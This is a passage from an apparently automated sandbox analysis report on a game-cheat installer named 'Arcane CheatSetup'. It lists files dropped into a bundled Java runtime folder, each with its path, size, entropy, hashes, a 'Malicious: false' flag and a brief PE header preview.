                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......84....@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DQ2M9.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.1347115439165085
                                Encrypted:false
                                SSDEEP:192:0Usw4DPU3XLPVT6GsKOhWIutUinYe+PjPriT0fwyI8:ew7PVIKyWIutDnYPLr728
                                MD5:B4EB9B43C293074406ADCA93681BF663
                                SHA1:16580FB7139D06A740F30D34770598391B70AC96
                                SHA-256:8CD69AF7171F24D57CF1E6D0D7ACD2B35B4EA5FDF55105771141876A67917C52
                                SHA-512:A4E999E162B5083B6C6C3EAFEE4D84D1EC1C61DCA6425F849F352FFDCCC2E44DFEE0625C210A8026F9FF141409EEBF9EF15A779B26F59B88E74B6A2CE2E82EF9
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Z.[.Z.[.Z.[.A<..[.[.A<..Q.[.A<.._.[.S...X.[.Z.Z.D.[.A<..Y.[.A<..[.[.A<..[.[.A<..[.[.RichZ.[.................PE..L...zPjW...........!......................... .....m.........................`.......2....@.........................`%......,"..P....@..p............"..@....P.. .... ............................... ..@............ ...............................text............................... ..`.rdata..a.... ......................@..@.data...`....0......................@....rsrc...p....@......................@..@.reloc..^....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F27BH.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):115776
                                Entropy (8bit):6.787384437276838
                                Encrypted:false
                                SSDEEP:1536:0LHPDcdivqC4xMfl/hAxfZ/t0QHQIM7iVxoQCpGlyir0wIOfnToIfemrVZQirM:0rPDco4xMNEfZ1LQG4igmvTBfem7QcM
                                MD5:AB6ED0CFD0C52DBEDE1BE910EFA8A89B
                                SHA1:83CBC2746A50C155261407ECE3D7A5C58AAD0437
                                SHA-256:8A6FBB08E0F418A3BB80CC65233E7270C820741DD57525ED7FD3CC479A49396E
                                SHA-512:41773183FC20E42BF208064163AA55658692B9221560146E4F6A676F96FC76541ED82F1EFDFA31F8C25BA42F271F7D9087DE681DA937BBF0EB2C781E027F1218
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g0...c...c...c..c...c...c...cP..c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...cRich...c........PE..L...oPjW...........!........................0.....m......................................@.........................@.......|...(.......................@...........p1.............................. ...@............0..0............................text...L........................... ..`.rdata...f...0...h..................@..@.data....,..........................@....rsrc...............................@..@.reloc..Z...........................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F39U2.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33344
                                Entropy (8bit):6.5580840927675945
                                Encrypted:false
                                SSDEEP:768:5TuVpsEkV3/azbYJHf2ZdCwhxKdv0tCFC7dRb:5YQV3/az8x2HCSScC4dRb
                                MD5:EFF31A13A4A5D3E9A5BD36E7349D028B
                                SHA1:8E47BE8C1CE4DFD73B7041679E96EA4A17DDB4C0
                                SHA-256:307B816892FDD9BAD9E28953E1BBB4BCE35C8F8CA783C369D7EB52A22BCC4229
                                SHA-512:72148C757624868D3866C40B31149CCA171737D82ADBCDF2C8FB03A9D8F3C1CEA2B2FC5137DD11DAAD2328D3AF8FAE43568DCCD843664BC43323F9357B67B6A0
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\j.29.29.29w..9.29...9.29...9.29..9.29...9.29.39..29...9..29...9.29...9.29...9.29Rich.29........PE..L...pPjW...........!.....,...>......H6.......@.....o................................T.....@..........................T.......K.......................j..@...........pA..............................XJ..@............@..P............................text...^+.......,.................. ..`.rdata...-...@.......0..............@..@.data...@....p.......^..............@....rsrc................`..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F8M96.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475020301731584
                                Encrypted:false
                                SSDEEP:384:GpsE5cnm6ObmSHhV8j0eeq4SziahnYPLr79OOu:Gpszn6iS/8jxeqfhC78Ou
                                MD5:4F11D43AA2215CE771DA528878F01C8E
                                SHA1:8062681D73489FF200CA0BA426FF1FF3F44494A7
                                SHA-256:0D554CD4B373D6D9B9C179A468D179388706C0BDE4D878ED75EF575651588B3C
                                SHA-512:34CB271C32FB479CFAEEC536A5D35A41730E90001D67DC9DB595DB240A1F58C3BF12334BB5CDE7673C8E56A4C272BFBD66E4EACDEE0082F6FD583E4E039EC540
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......C....@.................................$#..P....@..@............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...@....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FA3UT.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):223296
                                Entropy (8bit):6.501845596055873
                                Encrypted:false
                                SSDEEP:6144:8P8OC0xbNXLJAEh4hijzud6kAgZkFGMReiDfbgOBI1:8P8OC0xbNXLJAEh4hijzud6kAgYGSA
                                MD5:9D5EDECF7E33DDD0E2A6A0D34FC12CA1
                                SHA1:FC228A80FF85D78AA5BFBA2515EFED3257B9B009
                                SHA-256:6D817519C2E2EFDD3986EB655C1F687D4774730AB20768DF1C0AAEF03B110965
                                SHA-512:B4D58D3415D0255DCD87EF413762BC0F2934AAA6C8151344266949D3DD549ABDCA1366FA751A988CDDC1430EBF5D17668ADF02096DD4D5EAFE75604C0DA0B4C9
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wG.s3&. 3&. 3&. .h. 0&. (.. 6&. :^. ;&. (.. 4&. 3&. n&. (.4 n&. (.5 "&. (.. 2&. (.. 2&. (.. 2&. Rich3&. ........PE..L...oPjW...........!.........~.....................m.................................e....@......................... ;.......1.......`...............P..@....p......................................@...@............................................text............................... ..`.rdata...O.......P..................@..@.data........@.......,..............@....rsrc........`.......8..............@..@.reloc..L....p.......<..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FDP9A.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33934912
                                Entropy (8bit):6.35314231534845
                                Encrypted:false
                                SSDEEP:393216:VJ8d7SMzwH5R2sdDcBwHHdI4DKRlDsqXCagQZhzvilh2Wlq7ODI:VJ8d7zzUesdDtevn
                                MD5:4D857A5FC9CA16D2A67872FACCF85D9F
                                SHA1:EAEB632E526EFA946E4DB1B8CFA31DE6A7B03219
                                SHA-256:7FFA7423DDA07499394B345E5ECE2D54C8E19247E6E76C0E23B5BF1470AB0D7F
                                SHA-512:8DBC8675CE2DACE8D629C3FA66CF65704346AB829AE0B0A1D7B25BE22783B7E73624BA70F6D67264D6CA1656D7590E3753A8DF2227DA45112C5BD4A5654089AF
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........O..z!..z!..z!.c...z!..(...z!..(...z!......z!..z!..z!..(..hz!..(...z!......z!. ...z!..z ..{!......p!......z!..(...z!......z!.Rich.z!.................PE..L...~PjW...........!......... $....................m......................................@.................................X...x.......@...............@..............................................@............................................text.............................. ..`.rdata...E.......F..................@..@.data..............................@....unwante............................@..@.rsrc...@...........................@..@.reloc.............................@..B........................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FF2ON.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):186944
                                Entropy (8bit):6.612459610032652
                                Encrypted:false
                                SSDEEP:3072:XsSFQQB7SGWV2xrkvql6QPJD7mGVqjLypDTaDE5zwmFxy7HglbZrdIG:XJ97PxYAPJ/RV0tDCzw+xy0ldOG
                                MD5:E9373908186D0DA1F9EAD4D1FDAD474B
                                SHA1:C835A6B2E833A0743B1E8F6F947CFE5625FE791F
                                SHA-256:E2FBD6C6334D4765FF8DFF5C5FE3DF8B50015D0BF9124142748FADB987B492FF
                                SHA-512:BFDC236D462DAC45FD63C112E40558ED4E11E76FB4D713926A679FD573F67FA16451231A03178926B76BD267F092A33A3B6760CF4812DE2679BB9505B83F8261
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.+.#.x.#.x.#.x.mGx.#.x..Ax.#.x..ux3#.x.[Lx.#.x.[\x.#.x.#.x #.x.Utx.#.x..tx.#.x..Dx.#.x..Ex.#.x..Bx.#.xRich.#.x................PE..L....PjW...........!................K........ .....o................................,j....@................................. ...d.......................@............"...............................f..@............ ..P...L|.......................text...\........................... ..`.rdata...m... ...n..................@..@.data....5...........z..............@....rsrc...............................@..@.reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FKC0I.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):446528
                                Entropy (8bit):6.603555069382601
                                Encrypted:false
                                SSDEEP:12288:RreTVhY4gXwLR4YS+OX3kQg4O5kM2LY58gwDTxXvwGSelo:Rr4VhyK7eTxXvwelo
                                MD5:8AE40822B18B10494527CA3842F821D9
                                SHA1:202DFFA7541AD0FAD4F0D30CEE8C13591DCA5271
                                SHA-256:C9742396B80A2241CE5309C388B80000D0786A3CAB06A37990B7690FD0703634
                                SHA-512:AA324A265639C67843B4BF6828029B413044CBE4D7F06A253B78B060EA554FECC6E803D59D03742C485B2EB3D52E5C0A44928DCC927501F413EE4664BB8A11F5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f.4Z..gZ..gZ..g.}g^..gWUggX..gWUeg\..gWUZgW..gWU[g_..g..qg]..gZ..g...g'~Zg~..g'~[g...g'~fg[..gWUag[..g'~dg[..gRichZ..g........PE..L...uPjW...........!..............................m......................................@.........................@..........d.......................@........%...................................\..@...............,............................text...{........................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FLHTG.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):142912
                                Entropy (8bit):7.350682736920136
                                Encrypted:false
                                SSDEEP:3072:aoGzTjLkRPQ9U9NuLqcNicj5ojGylYCE2Iu2jGLF5A9bE8LUekfCz:LGz/oRPGLJN1IGgYCE2L1F5A9bEGUeR
                                MD5:4BDC32EF5DA731393ACC1B8C052F1989
                                SHA1:A677C04ECD13F074DE68CC41F13948D3B86B6C19
                                SHA-256:A3B35CC8C2E6D22B5832AF74AAF4D1BB35069EDD73073DFFEC2595230CA81772
                                SHA-512:E71EA78D45E6C6BD08B2C5CD31F003F911FD4C82316363D26945D17977C2939F65E3B9748447006F95C3C6653CE30D2CDA67322D246D43C9EB892A8E83DEB31A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..K.c.K.c.K.c.Br..I.c.P...H.c.P...I.c.P...N.c.K.b.m.c.P...m.c.P...J.c.P...J.c.P...J.c.RichK.c.........................PE..L...nPjW...........!.........Z......V.............Sm.........................@.......!....@.................................<...P.... ..................@....0..........................................@............................................text...n........................... ..`.rdata........... ..................@..@.data....+.......(..................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G1B5Q.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):39488
                                Entropy (8bit):6.751057397220933
                                Encrypted:false
                                SSDEEP:768:Okt1MVMrA9/Klzwz9UyCgMUt9onPs3h3nVt83OndMY7dmMpAnC70N:Oo1oMQ/CrPa3VWO+gdmMW6q
                                MD5:DE2167A880207BBF7464BCD1F8BC8657
                                SHA1:0FF7A5EA29C0364A1162A090DFFC13D29BC3D3C7
                                SHA-256:FD856EA783AD60215CE2F920FCB6BB4E416562D3C037C06D047F1EC103CD10B3
                                SHA-512:BB83377C5CFF6117CEC6FBADF6D40989CE1EE3F37E4CEBA17562A59EA903D8962091146E2AA5CC44CFDDDF280DA7928001EEA98ABF0C0942D69819B2433F1322
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.d....]...]...]...]...].H.]...].H.]...].H.]...]...]_..].H.]...].H.]...].H.]...].H.]...]Rich...]........................PE..L...pPjW...........!.....N...4.......W.......`.....p................................*k....@.................................<x..P.......................@...........Pa...............................v..@............`..<............................text....L.......N.................. ..`.rdata..e!...`..."...R..............@..@.data...(............t..............@....rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G6G2A.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):123968
                                Entropy (8bit):6.699694377005066
                                Encrypted:false
                                SSDEEP:1536:jWi/SLhxEJKv0O4+zwtKg3HquHB2u0YUdRXGCDilgKptxG0ULtt1vtxgl0IlgqA2:+vdtg6ZYUniPe5vtxgl0IlgqA2
                                MD5:0BAB62A0CF67481EA2A7F3CAFD7C5144
                                SHA1:D6B010C815F4D9C675DF918B615FE0AAE45249EA
                                SHA-256:FC57682FDBCA50FAEBFC6B4F5D199FC407A541C110C15F0C850503006D32301A
                                SHA-512:0128813DE247246BF4AECE1B222B6611E5AE1EDE01A1B339CFE0F98184739D7A066DAE4F1A271F544BB39F9B79F053F4B96F2E471B9444C29855CF52FB7835CB
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..@=..=..=..4.1.?....:.<..&G>.>..=.....&G<.:..&G..>..&G.....&G9.<..&G8.<..&G?.<..Rich=..................PE..L...qPjW...........!.........................0.....p......................................@.........................p...:...\...<.......................@............0..................................@............0...............................text............................... ..`.rdata.......0......................@..@.data...............................@....rsrc...............................@..@.reloc..>...........................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GFQTQ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475447140204412
                                Encrypted:false
                                SSDEEP:384:Gps85BnF26emSHhV8QM1eet4SzvBonYPLr7I:GpsGnFjS/8QBetJWC7I
                                MD5:43C1D1D0E248604CB3B643C0BDF4EC9A
                                SHA1:7BEE9DEB1E43F0FECF0FC57BDFD3F79CF048151F
                                SHA-256:165BFF317674BE33F2920320F3EF0957539E5BF149B673C2073DF48FF93A6D94
                                SHA-512:CAA9B14DF20FFF92CFC4F9A8557804FBD4CC02831824CD53AEAC7D0EE7918BBD50E22A69AB5FFC9E92A468A5201DF263707D373D60378817DC5FEFDE1ABC48BF
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......t....@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GMKU6.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.482296988184946
                                Encrypted:false
                                SSDEEP:384:n11I27Bf0jeZy+hiqEyRoPV527rBnYPLr7/U:nrJfYqodYJC78
                                MD5:4BDF31D370F8A893A22820A3B291CC1D
                                SHA1:BD27656B42F881EEE1940CFE15CF84C1938B57BA
                                SHA-256:C98DFAC99CC1E05D5F86B2577031A7624DCC13D0A8344B2855F166335177BC16
                                SHA-512:51623274C13DA71AD01DBAD7950444B512F08C3DC04E27F0321DF02E9F3C4DFB308DEF35F58524CCCCE79ED2A8859D85C16DC0D9BEA378E5538E23602D35AA76
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.m..d>..d>..d>.b.>..d>...>..d>..e>..d>...>..d>...>..d>...>..d>...>..d>...>..d>...>..d>Rich..d>........................PE..L....PjW...........!.........................0.....o.........................p......n.....@.........................P8..:....4..<....P...............(..@....`.......0...............................3..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-H7O6N.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):191040
                                Entropy (8bit):6.75061028420578
                                Encrypted:false
                                SSDEEP:3072:iUJiEoGLsncZizZQ7QBdCPdG3TBfMzrjZqMNGSplN2:iUJsnVzy7QBdC1G3TBEvFp6
                                MD5:E3E51A21B00CDDE757E4247257AA7891
                                SHA1:7F9E30153F1DF738179FFF084FCDBC4DAE697D18
                                SHA-256:7E92648B919932C0FBFE56E9645D785D9E18F4A608DF06E7C0E84F7CB7401B54
                                SHA-512:FC2981A1C4B2A1A3E7B28F7BF2BE44B0B6435FD43F085120946778F5C2C2CA73AD179796DEC0B92F0C6C8F6B63DD329EECC0AF1BB15392364C209DCF9CD6F7CA
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+H..E...E...E.L.....E..E....E..E....E......E...D...E..E..{.E..E....E..E....E.Rich..E.........PE..L....DjW.....................&....................@..........................0......aN....@.................................L*..d.......................@............................................$..@............................................text...~........................... ..`.rdata...s.......t..................@..@.data....4...@....... ..............@....rsrc................6..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-HUQAI.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19520
                                Entropy (8bit):6.452867740862137
                                Encrypted:false
                                SSDEEP:384:45kF/QP8xkI6hgWIE0PVlyJSZ9nYPLr7+:4SqP7I6rkd4EfC7+
                                MD5:503275E515E3F2770A62D11E386EADBF
                                SHA1:C7BE65796AA0E490779F202C67EEC5E9FBB65113
                                SHA-256:97B5D1C8E7AAACE5C86A418CB7418D3B0BA4F5E178DE3CF1031029F7F36832AF
                                SHA-512:AC7C0CB626C2D821F0F4E392EE4E02C9E0093F019AA5B2947E0C7B3290A0098A3D9BB803AB44FD304CA1F1D272CFB7B775E3C75C72C7523FF7240F38440CFC3C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."..|fl./fl./fl./}.(/dl./}.*/gl./}../dl./o.'/al./fl./_l./}../kl./}.//gl./}../gl./}.)/gl./Richfl./................PE..L...pPjW...........!.........................0.....m.........................p............@..........................=.......8..d....P...............4..@....`..\....1...............................6..@............0...............................text............................... ..`.rdata..w....0......................@..@.data...`....@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-I5RLV.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):128064
                                Entropy (8bit):6.428684952829155
                                Encrypted:false
                                SSDEEP:3072:uN77TJSG78+5Orcj5K/e2Hrgc6kZAn1yEkBKMKy1Zf22QYHJiuzTl8ShzzM+64mn:uNXd178+5fJZnQLo
                                MD5:2F808ED0642BD5CF8D4111E0AF098BBB
                                SHA1:006163A07052F3D227C2E541691691B4567F5550
                                SHA-256:61DFB6126EBA8D5429F156EAAB24FF30312580B0ABE4009670F1DD0BC64F87BB
                                SHA-512:27DBDA3A922747A031FF7434DE5A596725FF5AE2BC6DD83D6D5565EB2BA180B0516896323294459997B545C60C9E06DA6C2D8DD462A348A6759A404DB0F023A7
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[d.@:.N@:.N@:.N[..NB:.N[..NB:.N[..NK:.NIB.NE:.N@:.N{:.N[..NG:.N[..NA:.N[..NA:.N[..NA:.NRich@:.N........PE..L...rPjW...........!................#..............m................................p.....@.........................p...........P.......x...............@...........................................p...@............................................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...x...........................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KFFNG.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):25152
                                Entropy (8bit):6.627329311560644
                                Encrypted:false
                                SSDEEP:384:0mgNWEfK0RiC4qxJL8VI6ZEPG5Vv/11nYPLr7N:H6WmK0RiSxJ4VI6W+zbC7N
                                MD5:72B7054811A72D9D48C95845F93FCD2C
                                SHA1:D25F68566E11B91C2A0989BCC64C6EF17395D775
                                SHA-256:D4B63243D1787809020BA6E91564D17FFEA4762AF99201E241F4ECD20108D2E8
                                SHA-512:C6A16DAAF856939615DFDE8E9DBE9D5BFC415507011E85E44C6BF88B17B705C35CD7CED8EDA8F358745063F41096938D128DEE17E14FE93252E5B046BDFCDDC0
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..cK.cK.cK....cK....cK.cJ.cK....cK....cK....cK....cK....cK....cK.Rich.cK.........PE..L...nPjW...........!.....*...........4.......@....|m................................:6....@.........................0M.......H..<....p...............J..@............A...............................F..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........`.......@..............@....rsrc........p.......B..............@..@.reloc..z............F..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KH7DR.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.392776971200692
                                Encrypted:false
                                SSDEEP:384:GpssZwnvNmc6DDmSHhV8Ogee1cGPnYPLr7fl:GpssqnFm16S/8OVeLC7fl
                                MD5:7624A9B769CDCF3A75FE5A9FEAADD61F
                                SHA1:9269968968CD63D6E1ECC14F78B9A630FCC26FBE
                                SHA-256:41F9A804C888A58DECDE2B63A544DBFF536B40D87CECED197E1A14050858C0DA
                                SHA-512:1AF7BB30E1FC7600AD0A209DB4E077DAB9CEAA5C4332F8B1353ED0DB7EA71B4A9B7D126E756B634D3FB22618E39AFC5ED52263C88E9F7646EAABB0D9240E382B
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................z........ ....@..........................`......n.....@..................................#..P....@..\............(..@....P....... ..............................."..@............ ...............................text............................... ..`.rdata..J.... ......................@..@.data........0......................@....rsrc...\....@......................@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KL3UV.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):97856
                                Entropy (8bit):6.467907542894502
                                Encrypted:false
                                SSDEEP:1536:/fHGbDtpt+WfGegcX30EJ4YHiYmRkgAPe+GP8uWg1kQOPt:/w2WfGe/30EWbY4Z+GpWuHOPt
                                MD5:F78D2BF2C551BE9DF6A2F3210A2964C1
                                SHA1:B6A4160ECA4C0D0552234FF69BCFDF45F0A2A352
                                SHA-256:9D18E5421A8606985FA54D7CEA921D1B8930358A2E4CDF5FDF2A8B3E4D857288
                                SHA-512:AAC8622683BE57518F8B03198A03BF1F760E082692C1FB6252E96CDBA19D3CEB0A6786CCBD7B98830E865297308FA99DBBEA464E41041ABDDA18AEB862BA993F
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./zR/k.<|k.<|k.<|p..|{.<|p..|2.<|bc.|n.<|k.=|7.<|p..|O.<|p..|j.<|p..|j.<|p..|j.<|Richk.<|........................PE..L...pPjW...........!................At.............p................................7P....@..........................9..A....1..<....................f..@............................................,..@...............@............................text...\........................... ..`.rdata..Qg.......h..................@..@.data...`,...P.......8..............@....rsrc................F..............@..@.reloc..J............N..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KP5B8.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):64064
                                Entropy (8bit):6.338192715882019
                                Encrypted:false
                                SSDEEP:1536:Skh2CQuUlng7qkKi5iO8pm8cN9qOU33oit:Skkhu0nTli5jN8cNAOUHnt
                                MD5:B04ABE76C4147DE1D726962F86473CF2
                                SHA1:3104BADA746678B0A88E5E4A77904D78A71D1AB8
                                SHA-256:07FF22E96DCFD89226E5B85CC07C34318DD32CDA23B7EA0474E09338654BFEB3
                                SHA-512:2E4E2FEB63B6D7388770D8132A880422ABF6A01941BFF12CAD74DB4A641BDA2DCC8BF58F6DAE90E41CC250B79E7956DDF126943E0F6200272F3376A9A19505F1
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.|.{.|.{.|..N..y.|.{.}.g.|.v.x.|.v.y.|.v.w.|.v.y.|....Z.|....z.|.v.z.|....z.|.Rich{.|.........................PE..L...nPjW...........!......... ......_.............Vm......................... .......*....@.....................................<.......................@...........................................(...@...............t............................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LS3UA.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
